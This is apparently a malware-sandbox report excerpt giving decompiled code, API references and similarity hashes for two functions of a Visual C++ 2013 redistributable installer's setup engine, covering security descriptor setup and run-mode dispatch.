Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 9ab7b5faee63885ae8106f8838154d15ffec20b0d4a9600dcb9450c007ab07d5
Instruction ID: cb2cb4010cd50f060fe7ef4dd7414530d3ab8323e2037d46df5baf814e35685a
Opcode Fuzzy Hash: 9ab7b5faee63885ae8106f8838154d15ffec20b0d4a9600dcb9450c007ab07d5
Instruction Fuzzy Hash: 5C91E572AB1617FBE7301665AD4EB673D95AF10BA0F950338FB04FA190E799D90047D0

Uniqueness

Uniqueness Score: -1.00%

Function 012B2B14 Relevance: 49.4, APIs: 27, Strings: 1, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E012B2B14(void* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char* _v108;
				intOrPtr _v112;
				int _v116;
				int _v120;
				int _v124;
				int _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				void* _v140;
				intOrPtr _v144;
				int _v148;
				int _v152;
				int _v156;
				int _v160;
				char _v164;
				char _v168;
				char _v232;
				int _v236;
				void _v240;
				char _v304;
				int _v308;
				char _v312;
				char _v376;
				int _v380;
				char _v384;
				char _v448;
				int _v452;
				char _v456;
				char _v520;
				int _v524;
				char _v528;
				char _v532;
				int _v536;
				struct _SECURITY_DESCRIPTOR _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t115;
				signed int _t118;
				signed int _t121;
				signed int _t124;
				signed int _t127;
				char _t128;
				signed int _t131;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t140;
				void* _t162;
				char* _t163;
				void* _t164;
				intOrPtr* _t165;
				intOrPtr _t166;
				signed int _t167;
				signed int _t168;

				_t162 = __edx;
				_t96 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t96 ^ _t168;
				_v556.Revision = 0;
				_t163 =  &(_v556.Sbz1);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_v168 = 0;
				E012A7E30( &_v164, 0, 0x9c);
				_t164 = 0x40;
				_v536 = 0;
				_v240 = 0;
				_v236 = 0;
				E012A7E30( &_v232, 0, _t164);
				_v312 = 0;
				_v308 = 0;
				E012A7E30( &_v304, 0, _t164);
				_v384 = 0;
				_v380 = 0;
				E012A7E30( &_v376, 0, _t164);
				_v456 = 0;
				_v452 = 0;
				E012A7E30( &_v448, 0, _t164);
				_v528 = 0;
				_v524 = 0;
				E012A7E30( &_v520, 0, _t164);
				_v532 = 0;
				if(InitializeSecurityDescriptor( &_v556, 1) != 0) {
					_t165 = __imp__CreateWellKnownSid;
					_t163 = 0x48;
					_v532 = _t163;
					_t115 =  *_t165(0x1a, 0,  &_v240,  &_v532);
					__eflags = _t115;
					if(_t115 != 0) {
						_v532 = _t163;
						_t118 =  *_t165(0x17, 0,  &_v312,  &_v532);
						__eflags = _t118;
						if(_t118 != 0) {
							_v532 = _t163;
							_t121 =  *_t165(0x18, 0,  &_v384,  &_v532);
							__eflags = _t121;
							if(_t121 != 0) {
								_v532 = _t163;
								_t124 =  *_t165(0x10, 0,  &_v456,  &_v532);
								__eflags = _t124;
								if(_t124 != 0) {
									_v532 = _t163;
									_t127 =  *_t165(0x16, 0,  &_v528,  &_v532);
									__eflags = _t127;
									if(_t127 != 0) {
										_t128 = 3;
										_v168 = _t128;
										_t166 = 2;
										_v136 = _t128;
										_v104 = _t128;
										_v72 = _t128;
										_v40 = _t128;
										_v140 =  &_v240;
										_v12 =  &_v528;
										_v108 =  &_v312;
										_t131 =  &_v168;
										_v76 =  &_v384;
										_v164 = _t166;
										_v160 = 0;
										_v156 = 0;
										_v152 = 0;
										_v148 = 0;
										_v144 = _t166;
										_v132 = _t166;
										_v128 = 0;
										_v124 = 0;
										_v120 = 0;
										_v116 = 0;
										_v112 = _t166;
										_v100 = _t166;
										_v96 = 0;
										_v92 = 0;
										_v88 = 0;
										_v84 = 0;
										_v80 = _t166;
										_v68 = _t166;
										_v64 = 0;
										_v60 = 0;
										_v56 = 0;
										_v52 = 0;
										_v48 = _t166;
										_v44 =  &_v456;
										_v36 = _t166;
										_v32 = 0;
										_v28 = 0;
										_v24 = 0;
										_v20 = 0;
										_v16 = _t166;
										__imp__SetEntriesInAclA(5, _t131, 0,  &_v536); // executed
										__eflags = _t131;
										if(__eflags == 0) {
											_t134 = SetSecurityDescriptorOwner( &_v556,  &_v240, 0);
											__eflags = _t134;
											if(_t134 != 0) {
												_t137 = SetSecurityDescriptorGroup( &_v556,  &_v240, 0);
												__eflags = _t137;
												if(_t137 != 0) {
													_t139 = SetSecurityDescriptorDacl( &_v556, 1, _v536, 0);
													__eflags = _t139;
													if(_t139 != 0) {
														_t140 =  &_v556;
														__imp__CoInitializeSecurity(_t140, 0xffffffff, 0, 0, 6, _t166, 0, 0x3000, 0); // executed
														_t167 = _t140;
													} else {
														_t131 = GetLastError();
														__eflags = _t131;
														if(_t131 > 0) {
															_t131 = _t131 & 0x0000ffff | 0x80070000;
															__eflags = _t131;
														}
														_t167 = _t131;
														__eflags = _t167;
														if(_t167 >= 0) {
															_t167 = 0x80004005;
														}
														_push(_t167);
														_push(0xe7);
														goto L60;
													}
												} else {
													_t131 = GetLastError();
													__eflags = _t131;
													if(_t131 > 0) {
														_t131 = _t131 & 0x0000ffff | 0x80070000;
														__eflags = _t131;
													}
													_t167 = _t131;
													__eflags = _t167;
													if(_t167 >= 0) {
														_t167 = 0x80004005;
													}
													_push(_t167);
													_push(0xe1);
													goto L60;
												}
											} else {
												_t131 = GetLastError();
												__eflags = _t131;
												if(_t131 > 0) {
													_t131 = _t131 & 0x0000ffff | 0x80070000;
													__eflags = _t131;
												}
												_t167 = _t131;
												__eflags = _t167;
												if(_t167 >= 0) {
													_t167 = 0x80004005;
												}
												_push(_t167);
												_push(0xdb);
												goto L60;
											}
										} else {
											if(__eflags > 0) {
												_t131 = _t131 & 0x0000ffff | 0x80070000;
												__eflags = _t131;
											}
											_t167 = _t131;
											__eflags = _t167;
											if(_t167 >= 0) {
												_t167 = 0x80004005;
											}
											_push(_t167);
											_push(0xd6);
											goto L60;
										}
									} else {
										_t131 = GetLastError();
										__eflags = _t131;
										if(_t131 > 0) {
											_t131 = _t131 & 0x0000ffff | 0x80070000;
											__eflags = _t131;
										}
										_t167 = _t131;
										__eflags = _t167;
										if(_t167 >= 0) {
											_t167 = 0x80004005;
										}
										_push(_t167);
										_push(0xa2);
										goto L60;
									}
								} else {
									_t131 = GetLastError();
									__eflags = _t131;
									if(_t131 > 0) {
										_t131 = _t131 & 0x0000ffff | 0x80070000;
										__eflags = _t131;
									}
									_t167 = _t131;
									__eflags = _t167;
									if(_t167 >= 0) {
										_t167 = 0x80004005;
									}
									_push(_t167);
									_push(0x9b);
									goto L60;
								}
							} else {
								_t131 = GetLastError();
								__eflags = _t131;
								if(_t131 > 0) {
									_t131 = _t131 & 0x0000ffff | 0x80070000;
									__eflags = _t131;
								}
								_t167 = _t131;
								__eflags = _t167;
								if(_t167 >= 0) {
									_t167 = 0x80004005;
								}
								_push(_t167);
								_push(0x94);
								goto L60;
							}
						} else {
							_t131 = GetLastError();
							__eflags = _t131;
							if(_t131 > 0) {
								_t131 = _t131 & 0x0000ffff | 0x80070000;
								__eflags = _t131;
							}
							_t167 = _t131;
							__eflags = _t167;
							if(_t167 >= 0) {
								_t167 = 0x80004005;
							}
							_push(_t167);
							_push(0x8d);
							goto L60;
						}
					} else {
						_t131 = GetLastError();
						__eflags = _t131;
						if(_t131 > 0) {
							_t131 = _t131 & 0x0000ffff | 0x80070000;
							__eflags = _t131;
						}
						_t167 = _t131;
						__eflags = _t167;
						if(_t167 >= 0) {
							_t167 = 0x80004005;
						}
						_push(_t167);
						_push(0x86);
						goto L60;
					}
				} else {
					_t131 = GetLastError();
					if(_t131 > 0) {
						_t131 = _t131 & 0x0000ffff | 0x80070000;
					}
					_t167 = _t131;
					if(_t167 >= 0) {
						_t167 = 0x80004005;
					}
					_push(_t167);
					_push(0x7f);
					L60:
					_push("srputil.cpp");
					E012B294E(_t131);
				}
				if(_v536 != 0) {
					LocalFree(_v536);
				}
				return E012A7EAA(_t167, 0, _v8 ^ _t168, _t162, _t163, _t167);
			}

0x012b2b14
0x012b2b1d
0x012b2b24
0x012b2b2e
0x012b2b34
0x012b2b3a
0x012b2b3b
0x012b2b3c
0x012b2b3d
0x012b2b3e
0x012b2b45
0x012b2b4e
0x012b2b54
0x012b2b5b
0x012b2b65
0x012b2b6b
0x012b2b71
0x012b2b77
0x012b2b85
0x012b2b8b
0x012b2b91
0x012b2b9f
0x012b2ba5
0x012b2bab
0x012b2bb9
0x012b2bbf
0x012b2bc5
0x012b2bd3
0x012b2bd9
0x012b2bdf
0x012b2bf0
0x012b2bfe
0x012b2c27
0x012b2c2f
0x012b2c41
0x012b2c47
0x012b2c49
0x012b2c4b
0x012b2c88
0x012b2c8e
0x012b2c90
0x012b2c92
0x012b2ccf
0x012b2cd5
0x012b2cd7
0x012b2cd9
0x012b2d16
0x012b2d1c
0x012b2d1e
0x012b2d20
0x012b2d5d
0x012b2d63
0x012b2d65
0x012b2d67
0x012b2d95
0x012b2d96
0x012b2d9e
0x012b2d9f
0x012b2da5
0x012b2da8
0x012b2dab
0x012b2dba
0x012b2dc0
0x012b2dd0
0x012b2dda
0x012b2de0
0x012b2dec
0x012b2df2
0x012b2df8
0x012b2dfe
0x012b2e04
0x012b2e0a
0x012b2e10
0x012b2e13
0x012b2e16
0x012b2e19
0x012b2e1c
0x012b2e1f
0x012b2e22
0x012b2e25
0x012b2e28
0x012b2e2b
0x012b2e2e
0x012b2e31
0x012b2e34
0x012b2e37
0x012b2e3a
0x012b2e3d
0x012b2e40
0x012b2e43
0x012b2e46
0x012b2e49
0x012b2e4c
0x012b2e4f
0x012b2e52
0x012b2e55
0x012b2e58
0x012b2e5b
0x012b2e61
0x012b2e63
0x012b2e96
0x012b2e9c
0x012b2e9e
0x012b2ed6
0x012b2edc
0x012b2ede
0x012b2f17
0x012b2f1d
0x012b2f1f
0x012b2f60
0x012b2f67
0x012b2f6d
0x012b2f21
0x012b2f21
0x012b2f27
0x012b2f29
0x012b2f30
0x012b2f30
0x012b2f30
0x012b2f35
0x012b2f37
0x012b2f39
0x012b2f3b
0x012b2f3b
0x012b2f40
0x012b2f41
0x00000000
0x012b2f41
0x012b2ee0
0x012b2ee0
0x012b2ee6
0x012b2ee8
0x012b2eef
0x012b2eef
0x012b2eef
0x012b2ef4
0x012b2ef6
0x012b2ef8
0x012b2efa
0x012b2efa
0x012b2eff
0x012b2f00
0x00000000
0x012b2f00
0x012b2ea0
0x012b2ea0
0x012b2ea6
0x012b2ea8
0x012b2eaf
0x012b2eaf
0x012b2eaf
0x012b2eb4
0x012b2eb6
0x012b2eb8
0x012b2eba
0x012b2eba
0x012b2ebf
0x012b2ec0
0x00000000
0x012b2ec0
0x012b2e65
0x012b2e65
0x012b2e6c
0x012b2e6c
0x012b2e6c
0x012b2e71
0x012b2e73
0x012b2e75
0x012b2e77
0x012b2e77
0x012b2e7c
0x012b2e7d
0x00000000
0x012b2e7d
0x012b2d69
0x012b2d69
0x012b2d6f
0x012b2d71
0x012b2d78
0x012b2d78
0x012b2d78
0x012b2d7d
0x012b2d7f
0x012b2d81
0x012b2d83
0x012b2d83
0x012b2d88
0x012b2d89
0x00000000
0x012b2d89
0x012b2d22
0x012b2d22
0x012b2d28
0x012b2d2a
0x012b2d31
0x012b2d31
0x012b2d31
0x012b2d36
0x012b2d38
0x012b2d3a
0x012b2d3c
0x012b2d3c
0x012b2d41
0x012b2d42
0x00000000
0x012b2d42
0x012b2cdb
0x012b2cdb
0x012b2ce1
0x012b2ce3
0x012b2cea
0x012b2cea
0x012b2cea
0x012b2cef
0x012b2cf1
0x012b2cf3
0x012b2cf5
0x012b2cf5
0x012b2cfa
0x012b2cfb
0x00000000
0x012b2cfb
0x012b2c94
0x012b2c94
0x012b2c9a
0x012b2c9c
0x012b2ca3
0x012b2ca3
0x012b2ca3
0x012b2ca8
0x012b2caa
0x012b2cac
0x012b2cae
0x012b2cae
0x012b2cb3
0x012b2cb4
0x00000000
0x012b2cb4
0x012b2c4d
0x012b2c4d
0x012b2c53
0x012b2c55
0x012b2c5c
0x012b2c5c
0x012b2c5c
0x012b2c61
0x012b2c63
0x012b2c65
0x012b2c67
0x012b2c67
0x012b2c6c
0x012b2c6d
0x00000000
0x012b2c6d
0x012b2c00
0x012b2c00
0x012b2c08
0x012b2c0f
0x012b2c0f
0x012b2c14
0x012b2c18
0x012b2c1a
0x012b2c1a
0x012b2c1f
0x012b2c20
0x012b2f46
0x012b2f46
0x012b2f4b
0x012b2f4b
0x012b2f75
0x012b2f7d
0x012b2f7d
0x012b2f93

APIs

_memset.LIBCMT ref: 012B2B54
_memset.LIBCMT ref: 012B2B77
_memset.LIBCMT ref: 012B2B91
_memset.LIBCMT ref: 012B2BAB
_memset.LIBCMT ref: 012B2BC5
_memset.LIBCMT ref: 012B2BDF
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 012B2BF6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2C00
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 012B2C47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2C4D
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 012B2C8E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2C94
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 012B2CD5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2CDB
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 012B2D1C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2D22
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 012B2D63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2D69
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 012B2E5B
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 012B2E96
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2EA0
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 012B2ED6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2EE0
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 012B2F17
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012B2F21
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 012B2F67
LocalFree.KERNEL32(?), ref: 012B2F7D

Strings

srputil.cpp, xrefs: 012B2F46

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$_memset$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 3642641498-4105181634
Opcode ID: 315ad3334fd116fd6f3427e8c8bb81f07222756721b4ef10bd3e567b346e4b68
Instruction ID: 0f44cb8575bba37d7a480cc96f079ebae5d3ced66e26b177905e2f19a2fe9762
Opcode Fuzzy Hash: 315ad3334fd116fd6f3427e8c8bb81f07222756721b4ef10bd3e567b346e4b68
Instruction Fuzzy Hash: 97D164B1C5022AEBDB209F95DCC8BEEBAB8BB08340F0405BAE619F7140D7755E408F90

Uniqueness

Uniqueness Score: -1.00%

Function 01281B46 Relevance: 42.3, APIs: 7, Strings: 17, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E01281B46(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				signed short _v16;
				struct _OSVERSIONINFOW _v292;
				WCHAR* _v296;
				WCHAR* _v300;
				intOrPtr _v304;
				WCHAR* _v308;
				WCHAR* _v312;
				WCHAR* _v316;
				signed int* _v320;
				WCHAR* _v324;
				WCHAR* _v328;
				WCHAR* _v332;
				signed int _v336;
				signed int _v416;
				intOrPtr _v572;
				intOrPtr _v1304;
				char _v1320;
				signed int _v1324;
				char _v1384;
				intOrPtr _v1512;
				intOrPtr _v1524;
				intOrPtr _v1544;
				char _v1568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				void* _t87;
				signed int _t90;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t100;
				signed int _t104;
				signed int _t106;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t136;
				signed int _t141;
				void* _t145;
				void* _t151;
				signed int _t159;
				signed int _t161;
				signed int _t165;
				void* _t166;
				void* _t167;
				void* _t169;

				_t169 = __eflags;
				_t151 = __edx;
				_t145 = __ecx;
				_t77 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t77 ^ _t165;
				_v304 = _a4;
				_v336 = _a8;
				_v320 = _a16;
				_v332 = 0;
				_v308 = 0;
				_v324 = 0;
				_v316 = 0;
				_v328 = 0;
				E012A7E30( &_v292, 0, 0x11c);
				_v296 = 0;
				_v312 = 0;
				_v300 = 0;
				E012A7E30( &_v1568, 0, 0x4d0);
				_t167 = _t166 + 0x18;
				_t87 = E01281033( &_v1568, _t145, _t151, _t169); // executed
				if(_t87 >= 0) {
					_v1524 = _a12;
					E012AFA1A(3, 0);
					_t90 = E0128E1AA();
					__imp__CoInitializeEx(0, 0); // executed
					__eflags = _t90;
					if(_t90 >= 0) {
						_v332 = 1;
						E012AF054(GetModuleHandleW(0));
						_v308 = 1;
						__eflags = E012B315B(__eflags);
						if(__eflags >= 0) {
							_v324 = 1;
							_t94 = E012B3D19(__eflags);
							__eflags = _t94;
							if(_t94 >= 0) {
								_v316 = 1;
								_t95 = E012B4DC3(_t94);
								__eflags = _t95;
								if(_t95 >= 0) {
									_v328 = 1;
									_v292.dwOSVersionInfoSize = 0x11c;
									_t97 = GetVersionExW( &_v292);
									__eflags = _t97;
									if(_t97 != 0) {
										E012B1A74( &_v296, 0);
										_t161 = _v336;
										_t100 = _t161;
										__eflags = _t161;
										if(_t161 == 0) {
											_t100 = 0x12ba5c8;
										}
										_push(_t100);
										_push(_v296);
										_push(_v16 & 0x0000ffff);
										_push(_v292.dwBuildNumber);
										_push(_v292.dwMinorVersion);
										_push(_v292.dwMajorVersion);
										E01281566(2, 0x20000001, "3.7.2829.0");
										_t167 = _t167 + 0x24;
										__eflags = _v296;
										if(_v296 != 0) {
											E012B01E8(_v296);
											_v296 = 0;
										}
										_t104 = E0128D764(_t145, _t151, _t161,  &_v1568); // executed
										_t159 = _t104;
										__eflags = _t159;
										if(_t159 >= 0) {
											_t106 = _v416;
											__eflags = _t106;
											if(_t106 == 0) {
												_v312 = 1;
												_t159 = E012818B9(_t145, _t151,  &_v1568, _v304);
												__eflags = _t159;
												if(_t159 >= 0) {
													L37:
													_t146 = _v320;
													 *_v320 = _v1324;
													_v300 = _v1544;
													goto L38;
												}
												_push("Failed to run per-user mode.");
												goto L28;
											}
											_t131 = _t106 - 1;
											__eflags = _t131;
											if(_t131 == 0) {
												_t132 = E0128157C(_t145, _t151,  &_v1568, _v304, _t161); // executed
												_t159 = _t132;
												__eflags = _t159;
												if(_t159 >= 0) {
													goto L37;
												}
												_push("Failed to run per-machine mode.");
												goto L28;
											}
											_t133 = _t131 - 1;
											__eflags = _t133;
											if(_t133 == 0) {
												L31:
												_v312 = 1;
												_t159 = E01281AF3( &_v1568, 0, _t145, _t151, _v304);
												__eflags = _t159;
												if(_t159 >= 0) {
													goto L37;
												}
												_push("Failed to run embedded mode.");
												goto L28;
											}
											_t136 = _t133 - 1;
											__eflags = _t136;
											if(_t136 == 0) {
												goto L31;
											}
											__eflags = _t136 == 1;
											if(_t136 == 1) {
												_t159 = E01281226(_t145,  &_v1320, _a12);
												__eflags = _t159;
												if(_t159 >= 0) {
													goto L37;
												}
												_push("Failed to run RunOnce mode.");
												goto L28;
											}
											_t159 = 0x8000ffff;
											_push("Invalid run mode.");
											goto L28;
										} else {
											_push("Failed to initialize core.");
											L28:
											E012AFA86();
											_t146 = _t159;
											L38:
											if(_v296 != 0) {
												E012B01E8(_v296);
											}
											if(_t159 < 0 && _v572 == 0) {
												E012AF8AB(_t146, _t151, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
											}
											E0128B7B2( &_v1384);
											E01298988(_t146, _t151, _t159, _v1304); // executed
											if(_v300 != 0 && _v1512 != 0 && _v1512 != 6) {
												E01281566(2, 0xa0000008, E01291A96(_v1512));
												_t167 = _t167 + 0xc;
												_v300 = 0;
												_t159 = 0x80070bc2;
											}
											_t163 =  &_v1568;
											E012810DC(0, _t146,  &_v1568);
											if(_v328 != 0) {
												E012B4E21();
											}
											if(_v316 != 0) {
												E012B3E26();
											}
											if(_v324 != 0) {
												E012B31A3();
											}
											if(_v332 != 0) {
												__imp__CoUninitialize(); // executed
											}
											if(_v312 != 0) {
												if(_t159 >= 0) {
													_t163 =  *_v320;
												} else {
													_t163 = _t159;
												}
												_push(E01291879(_v300));
												E01281566(2, 0x20000007, _t163);
												if(_v300 != 0) {
													_push(0xa0000005);
													E01281566();
													_t146 = 2;
												}
											}
											if(_v308 != 0) {
												E012AF5CC(_t146, _t159, 0); // executed
											}
											if(_v300 != 0) {
												E012813BA(_t151);
											}
											_t186 = _v308;
											if(_v308 != 0) {
												E012AF62B(_t146, _t159, _t186, 0);
											}
											return E012A7EAA(_t159, 0, _v8 ^ _t165, _t151, _t159, _t163);
										}
									}
									_t141 = GetLastError();
									__eflags = _t141;
									if(_t141 > 0) {
										_t141 = _t141 & 0x0000ffff | 0x80070000;
										__eflags = _t141;
									}
									_t159 = _t141;
									__eflags = _t159;
									if(_t159 >= 0) {
										_t159 = 0x80004005;
									}
									E012B294E(_t141, "engine.cpp", 0x77, _t159);
									_push("Failed to get OS info.");
									goto L28;
								}
								_push("Failed to initialize XML util.");
								goto L28;
							}
							_push("Failed to initialize Wiutil.");
							goto L28;
						}
						_push("Failed to initialize Regutil.");
						goto L28;
					}
					_push("Failed to initialize COM.");
					goto L28;
				}
				_push("Failed to initialize engine state.");
				goto L28;
			}

0x01281b46
0x01281b46
0x01281b46
0x01281b4f
0x01281b56
0x01281b5e
0x01281b6a
0x01281b79
0x01281b87
0x01281b8d
0x01281b93
0x01281b99
0x01281b9f
0x01281ba5
0x01281bb7
0x01281bbd
0x01281bc3
0x01281bc9
0x01281bce
0x01281bd7
0x01281be0
0x01281bf2
0x01281bf8
0x01281bfd
0x01281c04
0x01281c0c
0x01281c0e
0x01281c1e
0x01281c2b
0x01281c30
0x01281c3d
0x01281c3f
0x01281c4b
0x01281c55
0x01281c5c
0x01281c5e
0x01281c6a
0x01281c74
0x01281c7b
0x01281c7d
0x01281c90
0x01281c9a
0x01281ca0
0x01281ca6
0x01281ca8
0x01281ce8
0x01281ced
0x01281cf3
0x01281cf5
0x01281cf7
0x01281cf9
0x01281cf9
0x01281cfe
0x01281cff
0x01281d09
0x01281d0a
0x01281d10
0x01281d16
0x01281d28
0x01281d2d
0x01281d30
0x01281d36
0x01281d3e
0x01281d43
0x01281d43
0x01281d51
0x01281d56
0x01281d58
0x01281d5a
0x01281d69
0x01281d69
0x01281d6b
0x01281e03
0x01281e12
0x01281e14
0x01281e16
0x01281e22
0x01281e28
0x01281e2e
0x01281e36
0x00000000
0x01281e36
0x01281e18
0x00000000
0x01281e18
0x01281d71
0x01281d71
0x01281d72
0x01281de5
0x01281dea
0x01281dec
0x01281dee
0x00000000
0x00000000
0x01281df0
0x00000000
0x01281df0
0x01281d74
0x01281d74
0x01281d75
0x01281db0
0x01281dbc
0x01281dcb
0x01281dcd
0x01281dcf
0x00000000
0x00000000
0x01281dd1
0x00000000
0x01281dd1
0x01281d77
0x01281d77
0x01281d78
0x00000000
0x00000000
0x01281d7a
0x01281d7b
0x01281da3
0x01281da5
0x01281da7
0x00000000
0x00000000
0x01281da9
0x00000000
0x01281da9
0x01281d7d
0x01281d82
0x00000000
0x01281d5c
0x01281d5c
0x01281d87
0x01281d88
0x01281d8e
0x01281e3c
0x01281e42
0x01281e4a
0x01281e4a
0x01281e51
0x01281e6e
0x01281e6e
0x01281e7a
0x01281e85
0x01281e90
0x01281eb6
0x01281ebb
0x01281ebe
0x01281ec4
0x01281ec4
0x01281ec9
0x01281ecf
0x01281eda
0x01281edc
0x01281edc
0x01281ee7
0x01281ee9
0x01281ee9
0x01281ef4
0x01281ef6
0x01281ef6
0x01281f01
0x01281f03
0x01281f03
0x01281f0f
0x01281f13
0x01281f1f
0x01281f15
0x01281f15
0x01281f15
0x01281f2c
0x01281f35
0x01281f43
0x01281f45
0x01281f4c
0x01281f52
0x01281f52
0x01281f43
0x01281f59
0x01281f5c
0x01281f5c
0x01281f67
0x01281f69
0x01281f69
0x01281f6e
0x01281f74
0x01281f77
0x01281f77
0x01281f8c
0x01281f8c
0x01281d5a
0x01281caa
0x01281cb0
0x01281cb2
0x01281cb9
0x01281cb9
0x01281cb9
0x01281cbe
0x01281cc0
0x01281cc2
0x01281cc4
0x01281cc4
0x01281cd1
0x01281cd6
0x00000000
0x01281cd6
0x01281c7f
0x00000000
0x01281c7f
0x01281c60
0x00000000
0x01281c60
0x01281c41
0x00000000
0x01281c41
0x01281c10
0x00000000
0x01281c10
0x01281be2
0x00000000

APIs

_memset.LIBCMT ref: 01281BA5
_memset.LIBCMT ref: 01281BC9

Part of subcall function 01281033: InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 01281057
Part of subcall function 01281033: InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 01281060

CoInitializeEx.OLE32(00000000,00000000,00000003,00000000), ref: 01281C04
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01281F03

Part of subcall function 01281226: CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,?), ref: 012812AC

Part of subcall function 0128157C: ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0128174B
Part of subcall function 0128157C: CloseHandle.KERNEL32(00000000,?,?,?,01281DEA,?,?), ref: 01281754

Part of subcall function 012818B9: IsWindow.USER32(?), ref: 01281AC3
Part of subcall function 012818B9: PostMessageW.USER32(?,00000010,00000000,00000000), ref: 01281AD6
Part of subcall function 012818B9: CloseHandle.KERNEL32(00000000,?,?,?,01281E12,?), ref: 01281AE5

Strings

Failed to initialize Regutil., xrefs: 01281C41
Invalid run mode., xrefs: 01281D82
Failed to run RunOnce mode., xrefs: 01281DA9
Failed to initialize engine state., xrefs: 01281BE2
3.7.2829.0, xrefs: 01281D1C
Setup, xrefs: 01281E68
Failed to run per-user mode., xrefs: 01281E18
Failed to initialize core., xrefs: 01281D5C
Failed to run embedded mode., xrefs: 01281DD1
Failed to run per-machine mode., xrefs: 01281DF0
txt, xrefs: 01281E5E
_Failed, xrefs: 01281E63
Failed to get OS info., xrefs: 01281CD6
Failed to initialize Wiutil., xrefs: 01281C60
Failed to initialize XML util., xrefs: 01281C7F
Failed to initialize COM., xrefs: 01281C10
engine.cpp, xrefs: 01281CCC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
